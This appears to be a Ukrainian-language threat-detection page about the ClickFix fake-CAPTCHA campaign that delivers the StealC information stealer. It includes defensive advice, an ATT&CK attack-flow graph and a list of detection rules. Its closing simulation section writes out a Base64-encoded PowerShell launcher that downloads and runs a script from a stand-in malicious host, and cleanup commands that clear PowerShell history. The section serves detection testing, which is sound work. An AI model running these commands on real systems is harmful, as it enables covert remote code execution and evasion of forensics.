Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Комплексне багатостадійне проникнення без використання файлів починається на скомпрометованому сайті в’єтнамського ресторану, де розміщено фальшивий CAPTCHA. Жертви підштовхуються до виконання PowerShell, який завантажує позиційно незалежний shellcode, який відбиває завантажувач 64-біт і вводить інформаційний стілкер StealC у svchost.exe. StealC збирає облікові дані браузера, дані гаманців криптовалюти, облікові дані Steam та Outlook, інформацію про хост та знімки екрана, а потім ексфільтрує через HTTP-трафік, зашифрований RC4.
Розслідування
Дослідники аналізували JavaScript та PowerShell завантажувачі, підтвердили використання фреймворку Donut shellcode та відстежували HTTP-запити завантажувача до URL-адрес, що належать зловмисникам. Стілець здається програмним забезпеченням як послуга, яке централізовано кероване з модульними функціями крадіжки та самознищення. Нотатки з полювання включають значення User-Agent ‘Loader’ та певні ключі реєстру, пов’язані з іниційованням і виконанням.
Захист
Рекомендовані заходи захисту включають обмеження або вимкнення вставки з буфера обміну в браузерах, посилення політики виконання PowerShell та сигнали на незвичайні рядки User-Agent. Додайте виявлення завантаження відбиваючих PE та ін’єкції процесу, а також забезпечте перевірку вихідного HTTP для доставки коректно закодованого на Base64 payload. Навчання користувачів щодо підроблених CAPTCHA-паст може бути використане як контроль, а не як після думки.
Відповідь
Якщо виявлено, ізолюйте кінцеву точку, зупиніть ін’єктований екземпляр svchost.exe, захопіть дампи пам’яті для аналізу shellcode і заблокуйте шкідливі домени/URL-адреси. Скиньте скомпрометовані облікові дані, перевірте артефакти реєстру та браузера на предмет впливу та стежте за залишковим трафіком C2.
“graph TB %% Class definitions classDef technique fill:#99ccff classDef action fill:#ffcc99 classDef process fill:#dddddd tech_content_injection[“<b>Техніка</b> – <b>T1659 Ін’єкція контенту</b>: Ін’єкція шкідливого JavaScript в скомпрометований вебсайт з метою доставки підробленого CAPTCHA.”] class tech_content_injection technique attack_user_exec[“<b>Дія</b> – <b>T1204.004 Виконання від користувача: Підроблене копіювання та вставлення</b>: Жертва запускає команду PowerShell через Win+R та Ctrl+V.”] class attack_user_exec action tech_powershell[“<b>Техніка</b> – <b>T1059.001 PowerShell</b>: Виконує скрипт PowerShell, який завантажує завантажувач у пам’ять.”] class tech_powershell technique tech_obfuscation[“<b>Техніка</b> – <b>T1027 Зашифровані файли або інформація</b>: Shellcode та рядки зашифровані, динамічне вирішення API (T1027.007), очищені вантажі (T1027.008).”] class tech_obfuscation technique tech_process_injection[“<b>Техніка</b> – <b>T1055 Ін’єкція процесу</b>: Ін’єкція переносного виконуваного файлу (T1055.002) та захоплення процесу (T1055.012) у svchost.exe.”] class tech_process_injection technique tech_masquerading[“<b>Техніка</b> – <b>T1036 Маскування</b>: Використання законного процесу svchost.exe для приховування шкідливої активності.”] class tech_masquerading technique tech_cred_browser[“<b>Техніка</b> – <b>T1555.003 Облікові дані з веб-браузерів</b>: Крадіжка збережених облікових даних браузера.”] class tech_cred_browser technique tech_steal_cookie[“<b>Техніка</b> – <b>T1539 Викрасти кукі веб-сеансу</b>: Захоплення авторизаційних кукіз браузера.”] class tech_steal_cookie technique tech_use_cookie[“<b>Техніка</b> – <b>T1550.004 Використання альтернативних матеріалів автентифікації: Кукі веб-сеансу</b>: Повторне використання вкрадених кукі для автентифікованого доступу.”] class tech_use_cookie technique tech_browser_discovery[“<b>Техніка</b> – <b>T1217 Виявлення інформації про браузер</b>: Збір інформації про встановлені браузери та їх конфігурації.”] class tech_browser_discovery technique tech_archive[“<b>Техніка</b> – <b>T1560 Архів зібраних даних</b>: Стиснення або архівація зібраних даних перед ексфільтрацією.”] class tech_archive technique tech_exfil_c2[“<b>Техніка</b> – <b>T1041 Ексфільтрація через канал C2</b>: Передача даних за допомогою каналу командування і контролю.”] class tech_exfil_c2 technique tech_encrypted_channel[“<b>Техніка</b> – <b>T1573 Зашифрований канал</b>: Захист ексфільтрації за допомогою шифрування (Base64+RC4).”] class tech_encrypted_channel technique tech_exfil_alt[“<b>Техніка</b> – <b>T1048.001 Ексфільтрація через альтернативний протокол</b>: Використання альтернативних протоколів для ексфільтрації даних.”] class tech_exfil_alt technique tech_file_deletion[“<b>Техніка</b> – <b>T1070.004 Видалення файлів</b>: Видалення файлів та артефактів для приховування слідів.”] class tech_file_deletion technique tech_clear_persistence[“<b>Техніка</b> – <b>T1070.009 Очищення від стійкості</b>: Видалення механізмів збереження після виконання.”] class tech_clear_persistence technique %% Connections showing attack flow tech_content_injection u002du002d>|призводить до| attack_user_exec attack_user_exec u002du002d>|виконує| tech_powershell tech_powershell u002du002d>|використовує| tech_obfuscation tech_obfuscation u002du002d>|активує| tech_process_injection tech_process_injection u002du002d>|використовує| tech_masquerading tech_process_injection u002du002d>|активує| tech_cred_browser tech_process_injection u002du002d>|активує| tech_steal_cookie tech_cred_browser u002du002d>|підтримує| tech_browser_discovery tech_browser_discovery u002du002d>|поставляє| tech_archive tech_archive u002du002d>|стислі дані| tech_exfil_c2 tech_steal_cookie u002du002d>|активує| tech_use_cookie tech_use_cookie u002du002d>|призводить до| tech_exfil_c2 tech_exfil_c2 u002du002d>|захищено| tech_encrypted_channel tech_exfil_c2 u002du002d>|використовує| tech_exfil_alt tech_exfil_c2 u002du002d>|спрацьовує| tech_file_deletion tech_file_deletion u002du002d>|також| tech_clear_persistence “
Потік атаки
Виявлення
Можливе використання PING для виконання з затримкою (через cmdline)
Перегляд
Підозріле завантаження файлів Direct IP (через проксі)
Перегляд
LOLBAS wmic (через cmdline)
Перегляд
Завантаження або вивантаження через Powershell (через cmdline)
Перегляд
IOC (SourceIP) для виявлення: Як ClickFix відкриває двері для прихованого StealC Information Stealer
Перегляд
IOC (HashSha256) для виявлення: Як ClickFix відкриває двері для прихованого StealC Information Stealer
Перегляд
IOC (DestinationIP) для виявлення: Як ClickFix відкриває двері для прихованого StealC Information Stealer
Перегляд
Виявити активність в мережі StealC Information Stealer [Windows Network Connection]
Перегляд
Виявити ін’єкцію процесу через StealC у svchost.exe [Windows Process Creation]
Перегляд
PowerShell EncodedCommand і iex(irm) виявлено [Windows Powershell]
Перегляд
Виконання симуляції
Передумова: Попередній зліт та базовий перевірки телеметрії повинні були бути пройдені.
Обґрунтування: Цей розділ детально описує точне виконання методики супротивника (TTP), розробленої для спрацьовування правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати визначені методи та мати на меті генерувати точну телеметрію, очікувану логікою виявлення.
-
Опис атаки та команди:
Атакуючий отримує фішинг-лист, що містить коротку URL-адресу. Мета – встановити віддалений PowerShell бекдор, не сповіщуючи користувача. Атакуючий створює payload для PowerShell у форматі Base64, який завантажує шкідливий скрипт з сервера C2 і негайно виконує його за допомогою
iex(irm…). Використовуючи-EncodedCommandперемикач, атакуючий приховує фактичні команди від випадкового огляду, іiex(irm…)шаблон напряму відповідає правилу виявлення.-
Створити шкідливий скрипт (
payload.ps1) розміщено наhttp://malicious.example.com/payload.ps1. -
Закодуйте команду запуску:
$launcher = "iex((New-Object System.Net.WebClient).DownloadString('http://malicious.example.com/payload.ps1'))" $bytes = [System.Text.Encoding]::Unicode.GetBytes($launcher) $encoded = [Convert]::ToBase64String($bytes) Write-Output $encoded # це значення використовується на наступному етапі -
Виконайте закодовану команду на цільовому об’єкті:
powershell.exe -EncodedCommand <Base64StringFromStep2>
Це генерує подію Sysmon ProcessCreate, де
CommandLineмістить-EncodedCommandand декодований текст включаєiex(irm…), що відповідає правилу Sigma. -
-
Скрипт регресійного тестування:
#----------------------------------------------------------- # Скрипт моделювання – Спрацьовує PowerShell EncodedCommand + iex(irm) #----------------------------------------------------------- # 1. Вкажіть URL-адресу шкідливого скрипту (замініть на ваш тестовий сервер) $maliciousUrl = "http://malicious.example.com/payload.ps1" # 2. Створіть однорядкову команду, що завантажує та виконує скрипт $cmd = "iex((New-Object System.Net.WebClient).DownloadString('$maliciousUrl'))" # 3. Закодуйте команду в Base64 (Unicode) $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd) $b64 = [Convert]::ToBase64String($bytes) # 4. Запустіть PowerShell із закодованою командою Write-Host "Виконання закодованої команди..." Start-Process -FilePath "$env:windirSystem32WindowsPowerShellv1.0powershell.exe" ` -ArgumentList "-EncodedCommand $b64" ` -NoNewWindow -Wait Write-Host "Симуляція завершена." -
Команди очищення:
# Видаліть будь-які тимчасові файли, створені шкідливим навантаженням (якщо такі є) # Приклад: видаліть завантажений скрипт, якщо він був збережений локально $tempPath = "$env:TEMPpayload.ps1" if (Test-Path $tempPath) { Remove-Item $tempPath -Force Write-Host "Видалено тимчасове навантаження." } # За бажанням, очистіть історію PowerShell для зменшення судової слідової роботи Clear-History